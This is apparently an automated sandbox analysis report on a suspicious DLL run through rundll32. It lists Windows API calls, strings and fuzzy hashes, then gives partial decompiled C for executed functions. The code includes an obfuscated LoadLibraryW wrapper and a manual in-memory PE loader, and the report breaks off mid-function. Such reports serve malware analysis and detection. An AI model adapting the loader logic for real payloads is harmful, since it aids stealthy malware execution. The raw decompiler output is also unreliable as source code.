                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                          • __getptd.LIBCMT ref: 10037778
                          • __getptd.LIBCMT ref: 10037786
                          • __getptd.LIBCMT ref: 10037791
                          • _CallCatchBlock2.LIBCMT ref: 100377B7
                            • Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521
                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B
                          Similarity
                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                          • String ID:
                          • API String ID: 1602911419-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: Window$Rect$ClientCtrlLongScreen
                          • String ID:
                          • API String ID: 1315500227-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Similarity
                          • API ID: _memset
                          • String ID: @$@$AfxFrameOrView90s$AfxMDIFrame90s
                          • API String ID: 2102423945-455206835
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Similarity
                          • API ID: _strlen$IconLoad_memset
                          • String ID: 127.0.0.1
                          • API String ID: 858515944-3619153832
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetMenuCheckMarkDimensions.USER32 ref: 1002099A
                          • _memset.LIBCMT ref: 10020A12
                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10020A75
                          • LoadBitmapA.USER32 ref: 10020A8D
                          Strings
                          Similarity
                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                          • String ID:
                          • API String ID: 4271682439-3916222277
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
                          • GetSystemMetrics.USER32 ref: 10025168
                          • GetSystemMetrics.USER32 ref: 1002516F
                          Strings
                          Similarity
                          • API ID: System$Metrics$InfoParameters
                          • String ID: B$DISPLAY
                          • API String ID: 3136151823-3316187204
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Similarity
                          • API ID:
                          • String ID: Edit
                          • API String ID: 0-554135844
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __getptd.LIBCMT ref: 1003748E
                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                          • __getptd.LIBCMT ref: 1003749F
                          • __getptd.LIBCMT ref: 100374AD
                          Strings
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: MOC$csm
                          • API String ID: 803148776-1389381023
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
                          • _memset.LIBCMT ref: 1002A78B
                          • GetWindowTextA.USER32 ref: 1002A7A5
                          • lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
                          • SetWindowTextA.USER32(?,?), ref: 1002A7C3
                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                          Similarity
                          • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                          • String ID:
                          • API String ID: 289641511-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __getptd.LIBCMT ref: 10033049
                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                          • __amsg_exit.LIBCMT ref: 10033069
                          • __lock.LIBCMT ref: 10033079
                          • InterlockedDecrement.KERNEL32(?), ref: 10033096
                          • InterlockedIncrement.KERNEL32(04741648), ref: 100330C1
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                          • String ID:
                          • API String ID: 4271482742-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                            • Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02
                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                          • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 100286CC
                          • FreeLibrary.KERNEL32(?), ref: 100286DC
                          Strings
                          Similarity
                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                          • String ID: HtmlHelpA$hhctrl.ocx
                          • API String ID: 3274081130-63838506
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF
                          Strings
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: IsProcessorFeaturePresent$KERNEL32
                          • API String ID: 1646373207-3105848591
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetLastError.KERNEL32(0000007F), ref: 100031BF
                          • SetLastError.KERNEL32(0000007F), ref: 100031EB
                          Similarity
                          • API ID: ErrorLast
                          • String ID:
                          • API String ID: 1452528299-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003EEF8
                          • __isleadbyte_l.LIBCMT ref: 1003EF2C
                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EF5D
                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EFCB
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: __msize_malloc
                          • String ID:
                          • API String ID: 1288803200-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 100033CE
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 100033DA
                          • HeapFree.KERNEL32(00000000), ref: 100033E1
                          Strings
                          Similarity
                          • API ID: FreeHeap$ProcessVirtual
                          • String ID: Oxt
                          • API String ID: 190046822-1245641732
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: Exception@8Throw$__cftof
                          • String ID:
                          • API String ID: 887240167-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
                          • LoadResource.KERNEL32(?,00000000), ref: 100231B0
                          • LockResource.KERNEL32(00000000), ref: 100231C2
                          • FreeResource.KERNEL32(00000000), ref: 10023210
                          Similarity
                          • API ID: Resource$FindFreeLoadLock
                          • String ID:
                          • API String ID: 1078018258-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3.LIBCMT ref: 10024E1A
                            • Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F
                          • __CxxThrowException@8.LIBCMT ref: 10024E50
                          • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004DCF4,00000004,1000166C,8007000E), ref: 10024E7B
                            • Part of subcall function 10023B77: __cftof.LIBCMT ref: 10023B88
                          • LocalFree.KERNEL32(8007000E,8007000E), ref: 10024EA4
                          Similarity
                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
                          • String ID:
                          • API String ID: 1808948168-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3.LIBCMT ref: 100217B5
                            • Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4
                          • __strdup.LIBCMT ref: 100217D7
                          • GetCurrentThread.KERNEL32 ref: 10021804
                          • GetCurrentThreadId.KERNEL32 ref: 1002180D
                          Similarity
                          • API ID: CurrentH_prolog3Thread$__strdup
                          • String ID:
                          • API String ID: 4206445780-0
                          • Opcode ID: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
                          • Instruction ID: 63c4b4d8ed515ebd67a2d3fac6e93b486822e3c8ffac095a61f99a1b17b282e6
                          • Opcode Fuzzy Hash: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
                          • Instruction Fuzzy Hash: EC217DB8801B408EC321DF6A958124AFBF4FFA4600F50891FE5AAC7A22DBB4A441CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1002AC0E
                          • RegCloseKey.ADVAPI32(00000000), ref: 1002AC17
                          • swprintf.LIBCMT ref: 1002AC34
                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002AC45
                          Similarity
                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                          • String ID:
                          • API String ID: 22681860-0
                          • Opcode ID: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
                          • Instruction ID: b3e5ac37a67a2c34724f7244494befea3428c85a23c18ad1ae006fcf60cdee60
                          • Opcode Fuzzy Hash: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
                          • Instruction Fuzzy Hash: C901ED76500218ABDB10DF688D85FAF77ACEB49714F51082AFA01E3141DB74ED0487A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetTopWindow.USER32(00000000), ref: 10027E8D
                          • GetTopWindow.USER32(00000000), ref: 10027ECC
                          • GetWindow.USER32(00000000,00000002), ref: 10027EEA
                          Similarity
                          • API ID: Window
                          • String ID:
                          • API String ID: 2353593579-0
                          • Opcode ID: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
                          • Instruction ID: 7c1aa0b4fd0438a3880c8a8454d512b9e221987d8156c76486bb18807498cd50
                          • Opcode Fuzzy Hash: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
                          • Instruction Fuzzy Hash: 8101D33640062ABBDF139FA1AD05E9F3B6AFF492A0F424054FE1851060D736C961EBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetDlgItem.USER32 ref: 10027846
                          • GetTopWindow.USER32(00000000), ref: 10027859
                            • Part of subcall function 10027839: GetWindow.USER32(00000000,00000002), ref: 100278A0
                          • GetTopWindow.USER32(?), ref: 10027889
                          Similarity
                          • API ID: Window$Item
                          • String ID:
                          • API String ID: 369458955-0
                          • Opcode ID: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
                          • Instruction ID: f10d52d962ac960512d7384eec108a680d17f64428226a36a785d2fcb99e30ea
                          • Opcode Fuzzy Hash: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
                          • Instruction Fuzzy Hash: F301A23618166ABBCB229F51AC08E8F3A99FF417E0F814021FD0C91111DF31D911D6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                          • Instruction ID: 1693f95a625ffde70028128af171decd196e1ba2c6c978d497889c3db2691634
                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                          • Instruction Fuzzy Hash: 85117E3680054ABFCF139E80CC028EE3F62FB09299F548415FF1958032C736D9B1AB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
                          • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
                          • LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
                          • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2
                          Similarity
                          • API ID: Resource$FindFreeLoadLock
                          • String ID:
                          • API String ID: 1078018258-0
                          • Opcode ID: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
                          • Instruction ID: f3c4c51c49c486de2effa8659e681593a38c79611994fd5387b39b2d60b42ad5
                          • Opcode Fuzzy Hash: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
                          • Instruction Fuzzy Hash: B5F0C237200316BBD7019FAD9DC4A6B77ADEF866A17524038FE09D3210DE71DD448AB4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: _memsethtonsinet_addrsendto
                          • String ID:
                          • API String ID: 1158618643-0
                          • Opcode ID: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
                          • Instruction ID: 60f6b611a07b9dfdfd37c1fffb937be7e3926c5419f3fbf29161148c0f489d21
                          • Opcode Fuzzy Hash: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
                          • Instruction Fuzzy Hash: 7A015E75900208ABDB00DFA4C986BBF77B8FF48700F504459F90597281E770AA10DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __getptd.LIBCMT ref: 100337DB
                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                          • __getptd.LIBCMT ref: 100337F2
                          • __amsg_exit.LIBCMT ref: 10033800
                          • __lock.LIBCMT ref: 10033810
                          Similarity
                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                          • String ID:
                          • API String ID: 3521780317-0
                          • Opcode ID: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
                          • Instruction ID: dae39449bd8c003bde3e62b30ea038717af1cc855304bc2085dea34c93cae8e5
                          • Opcode Fuzzy Hash: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
                          • Instruction Fuzzy Hash: 72F06D7E909700AFE362DB74844674A37E0EF00762F118619B4419F3A1CF34B900CA91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
                          • PathFindExtensionA.SHLWAPI(?), ref: 10021778
                            • Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
                            • Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                            • Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                          Strings
                          Similarity
                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                          • String ID: %s%s.dll
                          • API String ID: 1311856149-1649984862
                          • Opcode ID: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
                          • Instruction ID: cb1c0cb3582a3260588f521687d4e0582820240ed98e8e3d3c47ebba61cd8817
                          • Opcode Fuzzy Hash: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
                          • Instruction Fuzzy Hash: DA01D1759002289FDB10DB28DD45AEF77FCEB85700F4104A6E505E7150EA70AE04CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 10030483: __getptd.LIBCMT ref: 10030489
                            • Part of subcall function 10030483: __getptd.LIBCMT ref: 10030499
                          • __getptd.LIBCMT ref: 1003786D
                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                          • __getptd.LIBCMT ref: 1003787B
                          Strings
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: csm
                          • API String ID: 803148776-1018135373
                          • Opcode ID: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
                          • Instruction ID: 9bdde97464bd0678537997cb56ba83c365607814a506e3d314dec82bc4d239b5
                          • Opcode Fuzzy Hash: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
                          • Instruction Fuzzy Hash: 5C014B38841245CECB36CFA0D8446AEB7F6FF08253F51442EE0495EAA1DF30EA81CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                          • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                          • LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                          Similarity
                          • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                          • String ID:
                          • API String ID: 3253506028-0
                          • Opcode ID: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
                          • Instruction ID: 3062035623b9543bfb964b4a27d18fc4dd6f5ea10993a44c93a1de297aa0e807
                          • Opcode Fuzzy Hash: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
                          • Instruction Fuzzy Hash: 48F09672900355AFEB009F68DCCCB09B7AAFBD6261FDB0017F14486122DF3499C5CAA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • EnterCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002AC9D
                          • TlsGetValue.KERNEL32(100863C0,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACB1
                          • LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACC7
                          • LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACD2
                          Similarity
                          • API ID: CriticalSection$Leave$EnterValue
                          • String ID:
                          • API String ID: 3969253408-0
                          • Opcode ID: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
                          • Instruction ID: 611a8f73b53b00c56169e9f5a31810a1fff77d91dc8bf1d27f242dc0fd10bd82
                          • Opcode Fuzzy Hash: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
                          • Instruction Fuzzy Hash: 42F054362005149FD3108F68DDC8C06B7ADFB8A2613664425E805D3221DA30F849EB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Executed Functions

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 329 36652b9-3665385 call 367fe29 call 366eb52 LoadLibraryW
                          C-Code - Quality: 82%
                          			E036652B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				intOrPtr _v28;
                          				void* _t47;
                          				struct HINSTANCE__* _t59;
                          				signed int _t61;
                          				signed int _t62;
                          				WCHAR* _t68;
                          
                          				_push(_a12);
                          				_t68 = __ecx;
                          				_push(_a8);
                          				_push(_a4);
                          				_push(__ecx);
                          				E0367FE29(_t47);
                          				_v24 = _v24 & 0x00000000;
                          				_v28 = 0x68392e;
                          				_v16 = 0xf5950b;
                          				_v16 = _v16 ^ 0xb3325752;
                          				_v16 = _v16 ^ 0xe58473b2;
                          				_v16 = _v16 ^ 0x56462a2c;
                          				_v8 = 0x3988bb;
                          				_t61 = 0x3a;
                          				_v8 = _v8 / _t61;
                          				_v8 = _v8 + 0xf338;
                          				_v8 = _v8 << 5;
                          				_v8 = _v8 ^ 0x0035ea14;
                          				_v12 = 0xe53120;
                          				_v12 = _v12 ^ 0xa236e8c8;
                          				_t62 = 0x62;
                          				_v12 = _v12 / _t62;
                          				_v12 = _v12 ^ 0x01ab7b97;
                          				_v20 = 0x973198;
                          				_v20 = _v20 * 0x60;
                          				_v20 = _v20 ^ 0x38bce55b;
                          				E0366EB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
                          				_t59 = LoadLibraryW(_t68); // executed
                          				return _t59;
                          			}














                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true
                          • Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp
                          • Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: 1$,*FV$.9h
                          • API String ID: 1029625771-1870595533
                          • Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
                          • Instruction ID: 445d76aeffa6418ba6e07782575acef4c8bf3c5fa4328e532c9cd7fd8371ec3a
                          • Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
                          • Instruction Fuzzy Hash: E32156B9D01208FBDF08DFA8D94A9EEBBB5FB40304F108198E815A7250D3B55B14DF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 399 10002d40-10002d67 call 100024a0 402 10002d70-10002d81 399->402 403 10002d69-10002d6b 399->403 405 10002d83-10002d90 402->405 406 10002d95-10002db0 call 100024a0 402->406 404 1000315a-1000315d 403->404 405->404 410 10002db2-10002db4 406->410 411 10002db9-10002dce 406->411 410->404 412 10002dd0-10002ddd 411->412 413 10002de2-10002def 411->413 412->404 414 10002df1-10002dfe 413->414 415 10002e03-10002e0c 413->415 414->404 416 10002e20-10002e41 415->416 417 10002e0e-10002e1b 415->417 420 10002e55-10002e5f 416->420 417->404 422 10002e61-10002e68 420->422 423 10002e97-10002ed2 GetNativeSystemInfo 420->423 424 10002e78-10002e84 422->424 425 10002e6a-10002e76 422->425 426 10002ed4-10002ee1 423->426 427 10002ee6-10002f05 VirtualAlloc 423->427 430 10002e87-10002e8d 424->430 425->430 426->404 428 10002f32-10002f4a 427->428 429 10002f07-10002f21 VirtualAlloc 427->429 439 10002f6c-10002fd0 call 100024a0 428->439 440 10002f4c-10002f67 428->440 429->428 432 10002f23-10002f2d 429->432 433 10002e95 430->433 434 10002e8f-10002e92 430->434 432->404 433->420 434->433 444 10002fd2 439->444 445 10002fdc-10003041 VirtualAlloc call 10002320 call 100024d0 439->445 440->404 447 1000314c-10003158 call 10003310 444->447 454 10003043 445->454 455 1000304d-1000305e 445->455 447->404 454->447 456 10003060-10003076 call 100029c0 455->456 457 10003078-1000307b 455->457 458 10003082-10003090 call 10002ab0 456->458 457->458 463 10003092 458->463 464 1000309c-100030a3 call 100027c0 458->464 463->447 466 100030a8-100030aa 464->466 467 100030b6-100030c4 call 10002940 466->467 468 100030ac 466->468 471 100030c6 467->471 472 100030cd-100030d6 467->472 468->447 471->447 473 100030d8-100030df 472->473 474 1000313d-10003140 472->474 476 100030e1-1000310d 473->476 477 1000312a-10003138 473->477 475 10003147-1000314a 474->475 475->404 475->447 480 1000311e-10003128 476->480 481 1000310f-1000311a 476->481 478 1000313b 477->478 478->475 480->478 481->447
                          C-Code - Quality: 36%
                          			E10002D40(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                          				void* _v8;
                          				void* _v12;
                          				signed short* _v16;
                          				void* _v20;
                          				void* _v24;
                          				long _v28;
                          				signed int _v32;
                          				intOrPtr _v64;
                          				char _v68;
                          				void* _v72;
                          				intOrPtr _v76;
                          				intOrPtr* _v80;
                          				intOrPtr _v84;
                          				void* _v88;
                          				intOrPtr _v92;
                          				intOrPtr _v96;
                          				intOrPtr _v100;
                          				void* _t181;
                          				void* _t192;
                          				void* _t199;
                          				void* _t203;
                          				void* _t223;
                          				intOrPtr _t278;
                          
                          				_v100 = __ecx;
                          				_v72 = 0;
                          				_v20 = 0;
                          				if(E100024A0(_v100, _a8, 0x40) != 0) {
                          					_v16 = _a4;
                          					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                          						if(E100024A0(_v100, _a8, _v16[0x1e] + 0xf8) != 0) {
                          							_v80 = _a4 + _v16[0x1e];
                          							if( *_v80 == 0x4550) {
                          								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
                          									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
                          										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
                          										_v32 =  *(_v80 + 0x38);
                          										_v12 = 0;
                          										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
                          											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
                          												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
                          											} else {
                          												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
                          											}
                          											if(_v88 > _v20) {
                          												_v20 = _v88;
                          											}
                          											_v12 = _v12 + 1;
                          											_v84 = _v84 + 0x28;
                          										}
                          										 *0x10047250( &_v68); // executed
                          										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _v64 - 0x00000001 &  !(_v64 - 1);
                          										_t65 = _v64 - 1; // -1
                          										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
                          											_t181 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
                          											_v24 = _t181;
                          											if(_v24 != 0) {
                          												L26:
                          												_v72 =  *0x10047240( *0x10047234(8, 0x34));
                          												if(_v72 != 0) {
                          													 *((intOrPtr*)(_v72 + 4)) = _v24;
                          													asm("sbb edx, edx");
                          													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
                          													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
                          													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
                          													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
                          													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
                          													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
                          													if(E100024A0(_v100, _a8,  *(_v80 + 0x54)) != 0) {
                          														_t192 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
                          														_v8 = _t192;
                          														E10002320(_v8, _v16,  *(_v80 + 0x54));
                          														 *_v72 = _v8 + _v16[0x1e];
                          														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
                          														_t199 = E100024D0(_v100, _a4, _a8, _v80, _v72); // executed
                          														if(_t199 != 0) {
                          															_t278 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
                          															_v76 = _t278;
                          															if(_t278 == 0) {
                          																 *((intOrPtr*)(_v72 + 0x18)) = 1;
                          															} else {
                          																 *((intOrPtr*)(_v72 + 0x18)) = E100029C0(_v100, _v72, _v76);
                          															}
                          															if(E10002AB0(_v100, _v72) != 0) {
                          																_t203 = E100027C0(_v100, _v72); // executed
                          																if(_t203 != 0) {
                          																	if(E10002940(_v100, _v72) != 0) {
                          																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
                          																			 *(_v72 + 0x2c) = 0;
                          																			L49:
                          																			return _v72;
                          																		}
